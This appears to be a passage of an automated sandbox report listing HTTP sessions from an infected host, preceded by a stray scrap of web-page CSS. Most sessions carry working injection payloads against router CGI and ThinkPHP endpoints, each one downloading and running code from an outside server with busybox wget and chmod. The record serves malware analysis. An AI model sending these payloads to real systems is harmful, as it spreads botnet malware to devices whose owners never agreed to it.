Arial, Helvetica, sans-serif;font-size: 11px;background: #FFFFFF url('/cgi-bin/images/error/err_bg.jpg');overflow: hidden;color: #A4A3A3;text-align: center;}.qnap_hyperlink a,.qnap_hyperlink a:link,.qnap_hyperlink a:visited{font-family:Verdana, Lucida Grande, Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;color: #A4A3A3;}.qnap_bar1{width: 980px;border-bottom: 1px solid #BCBCBC;padding-top: 10px;text-align: left;margin: 0 auto;}.qnap_bar_img{padding-botto

Session ID	Source IP	Source Port	Destination IP	Destination Port
958	192.168.2.15	42324	94.110.114.112	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:00.690193892 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
959	192.168.2.15	45298	94.123.65.74	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:00.718354940 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
960	192.168.2.15	33118	94.120.160.51	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:00.718651056 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
961	192.168.2.15	43580	94.136.239.109	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:00.741655111 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
962	192.168.2.15	49010	85.50.188.66	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:00.957562923 CET	290	IN	HTTP/1.0 400 Bad Request Server: httpd Date: Wed, 14 Feb 2024 08:31:25 GMT Content-Type: text/html CONTENT-LANGUAGE: en Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
963	192.168.2.15	54648	112.25.57.43	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:01.795046091 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:02.501950026 CET	479	IN	HTTP/1.1 400 Bad Request Server: Tengine Date: Wed, 14 Feb 2024 08:31:02 GMT Content-Type: text/html Content-Length: 249 Connection: close Via: live8.cn572[,0] Timing-Allow-Origin: * EagleId: 0000000017078994623198054e Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
964	192.168.2.15	54646	112.25.57.43	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:02.778008938 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:03.386940956 CET	479	IN	HTTP/1.1 400 Bad Request Server: Tengine Date: Wed, 14 Feb 2024 08:31:03 GMT Content-Type: text/html Content-Length: 249 Connection: close Via: live6.cn572[,0] Timing-Allow-Origin: * EagleId: 0000000017078994632115438e Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
965	192.168.2.15	55830	94.196.100.145	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:03.265928984 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
966	192.168.2.15	56432	94.122.94.213	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:03.267777920 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
967	192.168.2.15	56422	62.29.81.186	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:03.270450115 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
968	192.168.2.15	59512	94.121.79.9	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:03.270611048 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
969	192.168.2.15	44338	95.86.72.25	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:03.275615931 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
970	192.168.2.15	52948	31.136.201.203	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:03.467423916 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:04.087425947 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:05.335361004 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:07.927329063 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:13.047204971 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:23.031089067 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:42.742373943 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
971	192.168.2.15	44394	31.136.120.241	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:03.467600107 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:04.087410927 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:05.303338051 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:07.927352905 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:12.791101933 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:22.519062042 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:42.742404938 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
972	192.168.2.15	56478	31.136.70.52	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:03.487042904 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:04.151470900 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:05.495342970 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:08.183341980 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:13.559331894 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
